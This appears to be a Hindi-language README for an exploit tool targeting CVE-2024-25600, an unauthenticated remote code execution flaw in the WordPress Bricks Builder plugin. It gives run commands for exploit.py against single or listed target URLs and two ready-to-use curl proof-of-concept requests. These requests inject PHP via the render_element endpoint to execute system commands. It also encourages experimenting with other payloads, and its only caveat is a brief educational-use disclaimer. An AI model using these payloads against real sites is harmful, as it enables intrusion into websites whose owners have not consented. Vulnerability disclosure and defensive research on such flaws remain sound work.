
यह टूल 🛠️ वर्डप्रेस के Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता 🕳️ का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों 💻 पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है। यह टूल nonce प्राप्त करके और मनमाने कमांड निष्पादित करने के लिए विशेष रूप से निर्मित अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।
git clone का उपयोग करके इस रिपॉज़िटरी को अपनी स्थानीय मशीन 🖥️ पर क्लोन करें।pip install -r requirements.txt का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें।python exploit.py -u <URL> के साथ टूल चलाएँ।python exploit.py -l <file_path> के साथ टूल चलाएँ।प्रकटीकरण द्वारा प्रदान किया गया मूल PoC इस प्रकार है:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
अपडेट: दूसरा PoC (अधिक विश्वसनीय)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
यह संभव है कि अतिरिक्त पेलोड बेहतर परिणाम दे सकते हैं। यदि मेरा एक्सप्लॉइट या प्रूफ ऑफ कॉन्सेप्ट आपके लिए काम नहीं करता है, तो मैं आपको अधिक प्रभावी समाधान खोजने के लिए वैकल्पिक पेलोड के साथ प्रयोग करने के लिए प्रोत्साहित करता हूँ।
[HOST] को लक्ष्य वेबसाइट से और [NONCE] को साइट से प्राप्त nonce मान से बदलें।
CVE-2024-25600 भेद्यता के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।
इस README में दी गई जानकारी केवल शैक्षिक उद्देश्यों के लिए है। अनधिकृत रूप से वेबसाइटों या नेटवर्कों में हैकिंग करना अवैध और अनैतिक है। 🚫
इस भेद्यता को खोजने और रिपोर्ट करने वाले सुरक्षा शोधकर्ताओं को धन्यवाद, जिन्होंने समुदाय को उनके वेब अनुप्रयोगों को सुरक्षित करने में मदद करने के लिए जानकारी और उपकरण प्रदान किए।